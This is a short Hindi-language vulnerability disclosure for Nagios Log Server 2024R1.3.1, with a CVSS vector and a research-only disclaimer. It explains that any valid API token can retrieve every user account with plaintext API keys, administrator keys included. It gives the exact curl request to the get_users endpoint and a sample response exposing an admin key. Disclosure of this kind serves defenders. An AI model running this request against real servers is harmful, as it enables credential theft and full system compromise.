
Nagios Log Server 2024R1.3.1 में प्रमाणित API कुंजी एक्सपोज़र
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:Hकेवल अनुसंधान और अधिकृत परीक्षण के लिए। कृपया अनुमति के बिना सिस्टम के खिलाफ उपयोग न करें।
Nagios Log Server 2024R1.3.1 में एक API-स्तर की कमजोरी किसी भी उपयोगकर्ता को, जिसके पास वैध API टोकन है, उपयोगकर्ता खातों की पूरी सूची और उनके सादे पाठ में API कुंजियाँ प्राप्त करने की अनुमति देती है, जिसमें प्रशासक प्रमाणपत्र शामिल हैं। यह दोष उपयोगकर्ता गणना, विशेषाधिकार वृद्धि, और उजागर टोकन के अनधिकृत उपयोग के माध्यम से पूर्ण सिस्टम समझौता सक्षम बनाता है।
curl -X GET "http://<target-ip>/nagioslogserver/index.php/api/system/get_users?token=<valid_token>"
[
{
"name": "devadmin",
"username": "devadmin",
"email": "[email protected]",
"apikey": "dcaa1693a79d651ebc29d45c879b3fbbc730d2de",
"auth_type": "admin",
...
}
]